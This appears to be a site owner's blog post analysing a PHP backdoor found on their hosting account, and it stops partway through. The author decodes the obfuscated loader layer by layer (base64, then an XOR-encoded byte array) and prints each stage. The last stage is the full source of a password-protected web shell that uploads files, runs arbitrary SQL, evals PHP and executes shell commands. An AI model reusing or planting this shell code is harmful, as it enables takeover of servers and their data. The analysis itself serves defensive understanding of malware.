syMzU7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzIxMTsxNzM7MTczOzE2MTsyNTI7MjUxOzI1MzsyMDg7MjUzOzIzNDsyNTU7MjI3OzIzODsyMzY7MjM0OzE2NzsxNzM7MjExOzE3MzsxNzM7MTYzOzE3MzsxNjk7MjU0OzI1MDsyMjQ7MjUxOzE4MDsxNzM7MTYzOzE3MTsyMzY7MjI2OzIzNTsxNjY7MTYxOzE3MzsyMTE7MTczOzE3NTsyNTI7MjMwOzI0NTsyMzQ7MTc4OzE5MDsxODY7MTkxOzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyMzA7MjI1OzI1NTsyNTA7MjUxOzE3NTsyNTE7MjQ2OzI1NTsyMzQ7MTc4OzIzMTsyMzA7MjM1OzIzNTsyMzQ7MjI1OzE3NTsyMjU7MjM4OzIyNjsyMzQ7MTc4OzIzNDsyMjU7MjM2OzE3NTsyNDk7MjM4OzIyNzsyNTA7MjM0OzE3ODsxNjg7MTkxOzE2ODsxNzc7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MjMwOzIyNTsyNTU7MjUwOzI1MTsxNzU7MjUxOzI0NjsyNTU7MjM0OzE3ODsyMzE7MjMwOzIzNTsyMzU7MjM0OzIyNTsxNzU7MjI1OzIzODsyMjY7MjM0OzE3ODsyMzY7MjI2OzIzNTsyMDg7MjM0OzIyNTsyMzY7MTc1OzI0OTsyMzg7MjI3OzI1MDsyMzQ7MTc4OzE2ODsxNjg7MTc3OzE3MzsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsxNzM7MTc5OzIzMDsyMjU7MjU1OzI1MDsyNTE7MTc1OzI1MTsyNDY7MjU1OzIzNDsxNzg7MjUyOzI1MDsyMzc7MjI2OzIzMDsyNTE7MTc1OzIyNTsyMzg7MjI2OzIzNDsxNzg7MjA1OzIwODsyMjA7MjE4OzIwNTsxOTQ7MTk4OzIxOTsxNzU7MjQ5OzIzODsyMjc7MjUwOzIzNDsxNzg7MTY4OzIwMDsyMjQ7MTY4OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsxNjA7MjMzOzIyNDsyNTM7MjI2OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzIzMDsyMzM7MTc1OzE2NzsxNzE7MjM2OzIyNjsyMzU7MTc1OzE3NDsxNzg7MTc1OzE3MzsxNzM7MTY2OzE3NTsyNDQ7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzE3OTsyNTU7MjUzOzIzNDsxNzc7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTcxOzIzNjsyMjY7MjM1OzE3ODsyNTI7MjUxOzI1MzsyMzA7MjU1OzI1MjsyMjc7MjM4OzI1MjsyMzE7MjM0OzI1MjsxNjc7MTcxOzIzNjsyMjY7MjM1OzE2NjsxODA7MTMwOzEzMzsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzIzNDsyMzY7MjMxOzIyNDsxNzU7MTczOzIwMjsyNDc7MjM0OzIzNjsyNTA7MjUxOzIzMDsyMjU7MjMyOzE3NTsxNzE7MjM2OzIyNjsyMzU7MTc1OzIxMTsyMjU7MTczOzE4MDsxMzA7MTMzOzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MjM0OzIzNjsyMzE7MjI0OzE3NTsyMjY7MjQ2OzI1MjsyMzE7MjM0OzIyNzsyMjc7MjM0OzI0NzsyMzQ7MjM2OzE2NzsxNzM7MTcxOzIzNjsyMjY7MjM1OzE3MzsxNjY7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjM2OzIzMTsyMjQ7MTc1OzE3MzsxNzk7MTYwOzI1NTsyNTM7MjM0OzE3NzsxNzM7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzE3NTsxNzU7MTc1OzE3NTsyMzQ7MjQ3OzIzMDsyNTE7MTgwOzEzMDsxMzM7MTc1OzE3NTsxNzU7MTc1OzI0MjsxMzA7MTMzOzI0MjsxNzU7Iik7JHo9IiI7Zm9yZWFjaCgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?>

Two crucial things to know here are that the odd looking string of slashes, x'es and digits is binary code, and that binary code once served to the browser appears the same as regular typescript. Since binary code doesn't need to be unencoded and can be printed out, you can simply comment out the final expression and add:

echo $_8b7b;

to the bottom see what the first variable is doing. With a little persistent cut-and-pasting we find:

$_8b7b1f56= create_function(" ",base64_decode(" [a whole jumble of text] "));

Ah, now something we've seen before! Saving the base64 jumble and echo'ing it to the browser gives us:

<?php $k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;224;253;251;230;225;232;167;202;208;202;221;221;192;221;175;243;175;202;208;216;206;221;193;198;193;200;175;243;175;202;208;223;206;221;220;202;166;180;130;133;230;225;230;208;252;234;251;167;168;235;230;252;255;227;238;246;208;234;253;253;224;253;252;168;163;175;173;191;173;166;180;130;133;130;133;230;233;175;167;171;208;223;192;220;219;212;173;255;173;210;175;174;178;175;173;173;166;175;244;130;133;134;171;208;204;192;192;196;198;202;212;173;255;173;210;175;178;175;171;208;223;192;220;219;212;173;255;173;210;180;130;133;134;252;234;251;236;224;224;228;230;234;167;173;255;173;163;175;171;208;223;192;220;219;212;173;255;173;210;163;175;251;230;226;234;167;166;175;164;175;188;185;191;191;166;180;130;133;242;130;133;130;133;230;233;175;167;226;235;186;167;171;208;204;192;192;196;198;202;212;173;255;173;210;166;175;174;178;175;173;236;238;188;233;184;190;184;238;186;234;186;188;233;187;236;234;187;184;237;182;191;185;189;236;233;237;233;237;189;187;186;183;173;166;175;244;130;133;134;234;236;231;224;175;173;179;233;224;253;226;175;226;234;251;231;224;235;178;255;224;252;251;177;173;180;130;133;134;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;251;234;247;251;175;225;238;226;234;178;255;175;249;238;227;250;234;178;168;168;175;252;230;245;234;178;186;191;177;173;180;130;133;134;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;252;250;237;226;230;251;175;225;238;226;234;178;205;208;220;218;205;194;198;219;175;249;238;227;250;234;178;168;204;231;234;236;228;168;177;173;180;130;133;134;234;236;231;224;175;173;179;160;233;224;253;226;177;173;180;130;133;134;234;247;230;251;180;130;133;242;130;133;130;133;230;233;175;167;171;208;223;192;220;219;212;173;238;236;251;230;224;225;173;210;175;178;178;175;173;250;255;227;224;238;235;173;166;175;244;130;133;130;133;175;175;175;175;171;227;178;171;208;201;198;195;202;220;212;173;233;230;227;234;255;238;251;231;173;210;212;173;251;226;255;208;225;238;226;234;173;210;180;130;133;175;175;175;175;171;225;234;248;255;238;251;231;178;171;208;223;192;220;219;212;173;225;234;248;255;238;251;231;173;210;180;130;133;175;175;175;175;230;233;175;167;171;225;234;248;255;238;251;231;174;178;173;173;166;175;226;224;249;234;208;250;255;227;224;238;235;234;235;208;233;230;227;234;167;171;227;163;171;225;234;248;255;238;251;231;166;180;130;133;175;175;175;175;234;236;231;224;175;173;235;224;225;234;173;180;130;133;130;133;242;175;234;227;252;234;175;230;233;175;167;171;208;223;192;220;219;212;173;238;236;251;230;224;225;173;210;175;178;178;175;173;252;254;227;173;166;175;244;130;133;130;133;175;175;175;175;171;254;250;234;253;246;175;178;175;171;208;223;192;220;219;212;173;254;250;234;253;246;173;210;180;130;133;175;175;175;175;171;254;250;234;253;246;175;178;175;252;251;253;208;253;234;255;227;238;236;234;167;173;211;168;173;163;173;168;173;163;171;254;250;234;253;246;166;180;130;133;175;175;175;175;171;227;225;228;175;178;175;226;246;252;254;227;208;236;224;225;225;234;236;251;167;171;208;223;192;220;219;212;173;252;234;253;249;234;253;173;210;163;175;171;208;223;192;220;219;212;173;250;252;234;253;173;210;163;175;171;208;223;192;220;219;212;173;255;238;252;252;173;210;166;175;224;253;175;235;230;234;175;167;168;193;224;251;175;236;224;225;225;234;236;251;234;235;175;181;175;168;175;161;175;226;246;252;254;227;208;234;253;253;224;253;167;166;166;180;130;133;175;175;175;175;226;246;252;254;227;208;252;234;227;234;236;251;208;235;237;167;171;208;223;192;220;219;212;173;235;237;173;210;163;175;171;227;225;228;166;175;224;253;175;235;230;234;175;167;168;203;237;175;233;238;230;227;234;235;181;175;168;175;161;175;226;246;252;254;227;208;234;253;253;224;253;167;166;166;180;130;133;175;175;175;175;226;246;252;254;227;208;254;250;234;253;246;167;171;254;250;234;253;246;163;175;171;227;225;228;166;175;224;253;175;235;230;234;175;167;168;198;225;249;238;227;230;235;175;254;250;234;253;246;181;175;168;175;161;175;226;246;252;254;227;208;234;253;253;224;253;167;166;166;180;130;133;175;175;175;175;226;246;252;254;227;208;236;227;224;252;234;167;171;227;225;228;166;180;130;133;175;175;175;175;234;236;231;224;175;173;235;224;225;234;179;237;253;177;179;255;253;234;177;171;254;250;234;253;246;179;160;255;253;234;177;173;180;130;133;130;133;242;175;234;227;252;234;175;230;233;175;167;171;208;223;192;220;219;212;173;238;236;251;230;224;225;173;210;175;178;178;175;173;253;250;225;255;231;255;173;166;175;244;130;133;130;133;175;175;175;175;234;249;238;227;167;237;238;252;234;185;187;208;235;234;236;224;235;234;167;171;208;223;192;220;219;212;173;236;226;235;173;210;166;166;180;130;133;130;133;242;175;234;227;252;234;175;244;130;133;130;133;175;175;175;175;171;235;230;252;238;237;227;234;233;250;225;236;175;178;175;207;230;225;230;208;232;234;251;167;173;235;230;252;238;237;227;234;208;233;250;225;236;251;230;224;225;252;173;166;180;130;133;175;175;175;175;230;233;175;167;174;234;226;255;251;246;167;171;235;230;252;238;237;227;234;233;250;225;236;166;166;175;244;130;133;175;175;175;175;175;175;175;175;171;235;230;252;238;237;227;234;233;250;225;236;175;178;175;252;251;253;208;253;234;255;227;238;236;234;167;173;175;173;163;173;173;163;171;235;230;252;238;237;227;234;233;250;225;236;166;180;130;133;175;175;175;175;175;175;175;175;171;235;230;252;238;237;227;234;233;250;225;236;175;178;175;234;247;255;227;224;235;234;167;173;163;173;163;171;235;230;252;238;237;227;234;233;250;225;236;166;180;130;133;175;175;175;175;242;175;234;227;252;234;175;171;235;230;252;238;237;227;234;233;250;225;236;175;178;175;238;253;253;238;246;167;166;180;130;133;130;133;175;175;175;175;233;250;225;236;251;230;224;225;175;226;246;252;231;234;227;227;234;247;234;236;167;171;236;226;235;166;175;244;130;133;175;175;175;175;175;175;175;175;232;227;224;237;238;227;175;171;235;230;252;238;237;227;234;233;250;225;236;180;130;133;175;175;175;175;175;175;175;175;171;253;234;252;250;227;251;175;178;175;173;173;180;130;133;175;175;175;175;175;175;175;175;230;233;175;167;174;234;226;255;251;246;167;171;236;226;235;166;166;175;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;230;233;175;167;230;252;208;236;238;227;227;238;237;227;234;167;173;234;247;234;236;173;166;175;238;225;235;175;174;207;230;225;208;238;253;253;238;246;167;173;234;247;234;236;173;163;171;235;230;252;238;237;227;234;233;250;225;236;166;166;175;244;207;234;247;234;236;167;171;236;226;235;163;171;253;234;252;250;227;251;166;180;175;171;253;234;252;250;227;251;175;178;175;207;229;224;230;225;167;173;211;225;173;163;171;253;234;252;250;227;251;166;180;242;130;133;175;175;175;175;175;175;175;175;175;175;175;175;234;227;252;234;230;233;175;167;167;171;253;234;252;250;227;251;175;178;175;239;171;236;226;235;239;166;175;174;178;178;175;201;206;195;220;202;166;175;244;242;130;133;175;175;175;175;175;175;175;175;175;175;175;175;234;227;252;234;230;233;175;167;230;252;208;236;238;227;227;238;237;227;234;167;173;252;246;252;251;234;226;173;166;175;238;225;235;175;174;207;230;225;208;238;253;253;238;246;167;173;252;246;252;251;234;226;173;163;171;235;230;252;238;237;227;234;233;250;225;236;166;166;175;244;171;249;175;178;175;207;224;237;208;232;234;251;208;236;224;225;251;234;225;251;252;167;166;180;175;207;224;237;208;236;227;234;238;225;167;166;180;175;207;252;246;252;251;234;226;167;171;236;226;235;166;180;175;171;253;234;252;250;227;251;175;178;175;207;224;237;208;232;234;251;208;236;224;225;251;234;225;251;252;167;166;180;175;207;224;237;208;236;227;234;238;225;167;166;180;175;234;236;231;224;175;171;249;180;242;130;133;175;175;175;175;175;175;175;175;175;175;175;175;234;227;252;234;230;233;175;167;230;252;208;236;238;227;227;238;237;227;234;167;173;255;238;252;252;251;231;253;250;173;166;175;238;225;235;175;174;207;230;225;208;238;253;253;238;246;167;173;255;238;252;252;251;231;253;250;173;163;171;235;230;252;238;237;227;234;233;250;225;236;166;166;175;244;171;249;175;178;175;207;224;237;208;232;234;251;208;236;224;225;251;234;225;251;252;167;166;180;175;207;224;237;208;236;227;234;238;225;167;166;180;175;207;255;238;252;252;251;231;253;250;167;171;236;226;235;166;180;175;171;253;234;252;250;227;251;175;178;175;207;224;237;208;232;234;251;208;236;224;225;251;234;225;251;252;167;166;180;175;207;224;237;208;236;227;234;238;225;167;166;180;175;234;236;231;224;175;171;249;180;242;130;133;175;175;175;175;175;175;175;175;175;175;175;175;234;227;252;234;230;233;175;167;230;252;208;253;234;252;224;250;253;236;234;167;171;233;255;175;178;175;207;255;224;255;234;225;167;171;236;226;235;163;173;253;173;166;166;166;175;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;171;253;234;252;250;227;251;175;178;175;173;173;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;248;231;230;227;234;167;174;233;234;224;233;167;171;233;255;166;166;175;244;171;253;234;252;250;227;251;175;161;178;175;207;233;253;234;238;235;167;171;233;255;163;190;191;189;187;166;180;242;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;207;255;236;227;224;252;234;167;171;233;255;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;242;130;133;175;175;175;175;175;175;175;175;242;130;133;175;175;175;175;175;175;175;175;253;234;251;250;253;225;175;171;253;234;252;250;227;251;180;130;133;175;175;175;175;242;130;133;134;171;236;226;235;175;178;175;252;251;253;230;255;252;227;238;252;231;234;252;167;171;208;223;192;220;219;212;173;236;226;235;173;210;166;180;130;133;134;171;236;226;235;208;234;225;236;175;178;175;252;251;253;230;255;252;227;238;252;231;234;252;167;171;208;223;192;220;219;212;173;236;226;235;208;234;225;236;173;210;166;180;130;133;134;230;233;175;167;171;208;223;192;220;219;212;173;234;225;236;173;210;178;178;190;166;244;130;133;134;134;171;236;226;235;178;237;238;252;234;185;187;208;235;234;236;224;235;234;167;171;236;226;235;208;234;225;236;166;180;130;133;134;242;130;133;134;176;177;130;133;179;252;236;253;230;255;251;175;227;238;225;232;250;238;232;234;178;229;238;249;238;252;236;253;230;255;251;175;251;246;255;234;178;173;251;234;247;251;160;229;238;249;238;252;236;253;230;255;251;173;177;130;133;179;174;162;162;130;133;249;238;253;175;202;193;203;208;192;201;208;198;193;223;218;219;175;178;175;162;190;180;130;133;249;238;253;175;237;238;252;234;185;187;204;231;238;253;252;175;178;175;225;234;248;175;206;253;253;238;246;167;168;206;168;163;168;205;168;163;168;204;168;163;168;203;168;163;168;202;168;163;168;201;168;163;168;200;168;163;168;199;168;163;168;198;168;163;168;197;168;163;168;196;168;163;168;195;168;163;168;194;168;163;168;193;168;163;168;192;168;163;168;223;168;163;168;222;168;163;168;221;168;163;168;220;168;163;168;219;168;163;168;218;168;163;168;217;168;163;168;216;168;163;168;215;168;163;168;214;168;163;168;213;168;163;168;238;168;163;168;237;168;163;168;236;168;163;168;235;168;163;168;234;168;163;168;233;168;163;168;232;168;163;168;231;168;163;168;230;168;163;168;229;168;163;168;228;168;163;168;227;168;163;168;226;168;163;168;225;168;163;168;224;168;163;168;255;168;163;168;254;168;163;168;253;168;163;168;252;168;163;168;251;168;163;168;250;168;163;168;249;168;163;168;248;168;163;168;247;168;163;168;246;168;163;168;245;168;163;168;191;168;163;168;190;168;163;168;189;168;163;168;188;168;163;168;187;168;163;168;186;168;163;168;185;168;163;168;184;168;163;168;183;168;163;168;182;168;163;168;164;168;163;168;160;168;166;180;130;133;249;238;253;175;253;234;249;234;253;252;234;205;238;252;234;185;187;204;231;238;253;252;175;178;175;225;234;248;175;206;253;253;238;246;167;166;180;130;133;233;224;253;175;167;249;238;253;175;230;178;191;180;175;230;175;179;175;237;238;252;234;185;187;204;231;238;253;252;161;227;234;225;232;251;231;180;175;230;164;164;166;244;130;133;175;175;175;175;253;234;249;234;253;252;234;205;238;252;234;185;187;204;231;238;253;252;212;237;238;252;234;185;187;204;231;238;253;252;212;230;210;210;175;178;175;230;180;130;133;242;130;133;249;238;253;175;237;238;252;234;185;187;220;251;253;180;130;133;249;238;253;175;237;238;252;234;185;187;204;224;250;225;251;180;130;133;233;250;225;236;251;230;224;225;175;252;234;251;205;238;252;234;185;187;220;251;253;167;252;251;253;166;244;130;133;175;175;175;175;237;238;252;234;185;187;220;251;253;175;178;175;252;251;253;180;130;133;175;175;175;175;237;238;252;234;185;187;204;224;250;225;251;175;178;175;191;180;130;133;242;130;133;233;250;225;236;251;230;224;225;175;253;234;238;235;205;238;252;234;185;187;167;166;244;175;175;175;175;130;133;175;175;175;175;230;233;175;167;174;237;238;252;234;185;187;220;251;253;166;175;253;234;251;250;253;225;175;202;193;203;208;192;201;208;198;193;223;218;219;180;130;133;175;175;175;175;230;233;175;167;237;238;252;234;185;187;204;224;250;225;251;175;177;178;175;237;238;252;234;185;187;220;251;253;161;227;234;225;232;251;231;166;175;253;234;251;250;253;225;175;202;193;203;208;192;201;208;198;193;223;218;219;180;130;133;175;175;175;175;249;238;253;175;236;175;178;175;237;238;252;234;185;187;220;251;253;161;236;231;238;253;204;224;235;234;206;251;167;237;238;252;234;185;187;204;224;250;225;251;166;175;169;175;191;247;233;233;180;130;133;175;175;175;175;237;238;252;234;185;187;204;224;250;225;251;164;164;180;130;133;175;175;175;175;253;234;251;250;253;225;175;236;180;130;133;242;130;133;233;250;225;236;251;230;224;225;175;234;225;236;224;235;234;205;238;252;234;185;187;167;252;251;253;166;244;130;133;175;175;175;175;252;234;251;205;238;252;234;185;187;220;251;253;167;252;251;253;166;180;130;133;175;175;175;175;249;238;253;175;253;234;252;250;227;251;175;178;175;168;168;180;130;133;175;175;175;175;249;238;253;175;230;225;205;250;233;233;234;253;175;178;175;225;234;248;175;206;253;253;238;246;167;188;166;180;130;133;175;175;175;175;249;238;253;175;227;230;225;234;204;224;250;225;251;175;178;175;191;180;130;133;175;175;175;175;249;238;253;175;235;224;225;234;175;178;175;233;238;227;252;234;180;130;133;175;175;175;175;248;231;230;227;234;175;167;174;235;224;225;234;175;169;169;175;167;230;225;205;250;233;233;234;253;212;191;210;175;178;175;253;234;238;235;205;238;252;234;185;187;167;166;166;175;174;178;175;202;193;203;208;192;201;208;198;193;223;218;219;166;244;130;133;175;175;175;175;175;175;175;175;230;225;205;250;233;233;234;253;212;190;210;175;178;175;253;234;238;235;205;238;252;234;185;187;167;166;180;130;133;175;175;175;175;175;175;175;175;230;225;205;250;233;233;234;253;212;189;210;175;178;175;253;234;238;235;205;238;252;234;185;187;167;166;180;130;133;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;212;175;230;225;205;250;233;233;234;253;212;191;210;175;177;177;175;189;175;210;166;180;130;133;175;175;175;175;175;175;175;175;230;233;175;167;230;225;205;250;233;233;234;253;212;190;210;175;174;178;175;202;193;203;208;192;201;208;198;193;223;218;219;166;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;175;212;167;167;175;230;225;205;250;233;233;234;253;212;191;210;175;179;179;175;187;175;166;175;169;175;191;247;188;191;166;175;243;175;167;230;225;205;250;233;233;234;253;212;190;210;175;177;177;175;187;166;175;210;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;230;233;175;167;230;225;205;250;233;233;234;253;212;189;210;175;174;178;175;202;193;203;208;192;201;208;198;193;223;218;219;166;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;175;212;167;167;230;225;205;250;233;233;234;253;212;190;210;175;179;179;175;189;166;175;169;175;191;247;188;236;166;175;243;175;167;230;225;205;250;233;233;234;253;212;189;210;175;177;177;175;185;166;175;210;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;175;212;230;225;205;250;233;233;234;253;212;189;210;175;169;175;191;247;188;201;210;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;242;175;234;227;252;234;175;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;175;212;167;167;230;225;205;250;233;233;234;253;212;190;210;175;179;179;175;189;166;175;169;175;191;247;188;236;166;210;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;168;178;168;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;175;235;224;225;234;175;178;175;251;253;250;234;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;242;130;133;175;175;175;175;175;175;175;175;242;175;234;227;252;234;175;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;237;238;252;234;185;187;204;231;238;253;252;175;212;167;167;175;230;225;205;250;233;233;234;253;212;191;210;175;179;179;175;187;175;166;175;169;175;191;247;188;191;166;210;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;168;178;168;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;168;178;168;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;235;224;225;234;175;178;175;251;253;250;234;180;130;133;175;175;175;175;175;175;175;175;242;130;133;175;175;175;175;175;175;175;175;227;230;225;234;204;224;250;225;251;175;164;178;175;187;180;130;133;175;175;175;175;175;175;175;175;230;233;175;167;227;230;225;234;204;224;250;225;251;175;177;178;175;184;185;166;244;130;133;175;175;175;175;175;175;175;175;175;175;175;175;253;234;252;250;227;251;175;164;178;175;167;168;211;225;168;166;180;130;133;175;175;175;175;175;175;175;175;175;175;175;175;227;230;225;234;204;224;250;225;251;175;178;175;191;180;130;133;175;175;175;175;175;175;175;175;242;130;133;175;175;175;175;242;130;133;175;175;175;175;253;234;251;250;253;225;175;253;234;252;250;227;251;180;130;133;242;130;133;233;250;225;236;251;230;224;225;175;234;225;236;224;235;234;198;251;167;233;166;244;130;133;134;227;178;234;225;236;224;235;234;205;238;252;234;185;187;167;233;161;236;226;235;161;249;238;227;250;234;166;180;130;133;134;233;161;236;226;235;208;234;225;236;161;249;238;227;250;234;178;227;180;130;133;134;233;161;236;226;235;161;249;238;227;250;234;178;173;173;180;130;133;134;233;161;234;225;236;161;249;238;227;250;234;178;190;180;130;133;134;233;161;252;250;237;226;230;251;167;166;180;130;133;242;130;133;160;160;162;162;177;179;160;252;236;253;230;255;251;177;130;133;134;179;176;130;133;175;175;175;175;130;133;175;175;175;175;234;236;231;224;175;173;179;233;224;253;226;175;226;234;251;231;224;235;178;255;224;252;251;175;238;236;251;230;224;225;178;168;168;175;224;225;220;250;237;226;230;251;178;168;234;225;236;224;235;234;198;251;167;251;231;230;252;166;180;253;234;251;250;253;225;175;233;238;227;252;234;180;168;177;173;180;130;133;175;175;175;175;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;251;234;247;251;175;225;238;226;234;178;236;226;235;175;249;238;227;250;234;178;211;173;173;161;252;251;253;208;253;234;255;227;238;236;234;167;173;211;173;173;163;173;169;254;250;224;251;180;173;163;171;236;226;235;166;161;173;211;173;175;252;230;245;234;178;190;186;191;177;173;180;130;133;175;175;175;175;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;231;230;235;235;234;225;175;225;238;226;234;178;234;225;236;175;249;238;227;250;234;178;168;191;168;177;173;180;130;133;175;175;175;175;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;231;230;235;235;234;225;175;225;238;226;234;178;236;226;235;208;234;225;236;175;249;238;227;250;234;178;168;168;177;173;180;130;133;175;175;175;175;234;236;231;224;175;173;179;230;225;255;250;251;175;251;246;255;234;178;252;250;237;226;230;251;175;225;238;226;234;178;205;208;220;218;205;194;198;219;175;249;238;227;250;234;178;168;200;224;168;177;173;180;130;133;175;175;175;175;234;236;231;224;175;173;179;160;233;224;253;226;177;173;180;130;133;175;175;175;175;230;233;175;167;171;236;226;235;175;174;178;175;173;173;166;175;244;130;133;175;175;175;175;175;175;175;175;234;236;231;224;175;173;179;255;253;234;177;173;180;130;133;175;175;175;175;175;175;175;175;171;236;226;235;178;252;251;253;230;255;252;227;238;252;231;234;252;167;171;236;226;235;166;180;130;133;175;175;175;175;175;175;175;175;234;236;231;224;175;173;202;247;234;236;250;251;230;225;232;175;171;236;226;235;175;211;225;173;180;130;133;175;175;175;175;175;175;175;175;234;236;231;224;175;226;246;252;231;234;227;227;234;247;234;236;167;173;171;236;226;235;173;166;180;130;133;175;175;175;175;175;175;175;175;234;236;231;224;175;173;179;160;255;253;234;177;173;180;130;133;175;175;175;175;175;175;175;175;234;247;230;251;180;130;133;175;175;175;175;242;130;133;242;175;"); $z=""; foreach($m as $v)if ($v!="")$z.=chr($v^$k); eval($z); ?>

Which is a serious wall of ascii jumble! Letting the browser do the work for us again, we can cut and paste the code to a different script, change the final "eval" statement to "print", and again check the browser for the ascii-decoded results. The result includes html code that your browser will interpret, so to get to the raw script we need to look at the page source instead:

<?php error_reporting(E_ERROR | E_WARNING | E_PARSE); ini_set('display_errors', "0"); if ($_POST["p"] != "") { $_COOKIE["p"] = $_POST["p"]; setcookie("p", $_POST["p"], time() + 3600); } // Here is the hacker's password check (the password is hashed and so illegible). // Thank you, Hacker, for not leaving the system to any ol' Johnny-come-lately! if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") { echo "<form method=post>"; echo "<input type=text name=p value='' size=50>"; echo "<input type=submit name=B_SUBMIT value='Check'>"; echo "</form>"; exit; } // This script gives the hacker a lot of options, such as // uploading another file (such as the WSOWEB shell), or the // pernicious worm that infected my entire account. if ($_POST["action"] == "upload") { $l=$_FILES["filepath"]["tmp_name"]; $newpath=$_POST["newpath"]; if ($newpath!="") move_uploaded_file($l,$newpath); echo "done"; // YIKES! Database corruption! } else if ($_POST["action"] == "sql") { $query = $_POST["query"]; $query = str_replace("\'","'",$query); $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error()); mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error()); mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error()); mysql_close($lnk); echo "done<br><pre>$query</pre>"; } else if ($_POST["action"] == "runphp") { eval(base64_decode($_POST["cmd"])); } else { $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } else $disablefunc = array(); function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = @popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= @fread($fp,1024);} @pclose($fp); } } return $result; } $cmd = stripslashes($_POST["cmd"]); $cmd_enc = stripslashes($_POST["cmd_enc"]); if ($_POST["enc"]==1){ $cmd=base64_decode($cmd_enc); } ?> <script language=javascript type="text/javascript"> var END_OF_INPUT = -1; var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'); var reverseBase64Chars = new Array(); for (var i=0; i < base64Chars.length; i++){ reverseBase64Chars[base64Chars[i]] = i; } var base64Str; var base64Count; function setBase64Str(str){ base64Str = str; base64Count = 0; } function readBase64(){ if (!base64Str) return END_OF_INPUT; if (base64Count >= base64Str.length) return END_OF_INPUT; var c = base64Str.charCodeAt(base64Count) & 0xff; base64Count++; return c; } function encodeBase64(str){ setBase64Str(str); var result = ''; var inBuffer = new Array(3); var lineCount = 0; var done = false; while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){ inBuffer[1] = 